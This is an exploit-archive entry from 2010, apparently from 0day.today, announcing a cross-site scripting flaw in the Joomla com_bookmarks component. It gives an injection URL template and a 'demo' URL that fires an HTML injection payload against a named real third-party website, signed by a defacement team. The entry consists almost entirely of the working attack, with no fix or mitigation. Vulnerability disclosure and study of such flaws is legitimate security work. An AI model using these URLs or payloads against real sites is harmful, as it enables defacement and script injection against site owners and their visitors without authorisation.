id: 12292
date: 05/19/2010
title: Joomla Component com_bookmarks XSS Vulnerability
author: s4r4d0
cves: 

================================================
Joomla Component com_bookmarks XSS Vulnerability
================================================


[x] Joomla Component  Bookmarks
[x] Author: s4r4d0
[x] Contact: s4r4d0@yahoo.com
[x] Team: Fatal Error
[x] Bug: XSS on Component Bookmarks
[x] Example: http://www.site.com/index.php?option=com_bookmarks=[XSS]
[x] Demo:http://www.movinganthropology.de/index.php?option=com_bookmarks=">><marquee><h1>XSS By Fatal Error</h1><marquee>
[x] Made in Brazil



#  0day.today [2023-03-25]  #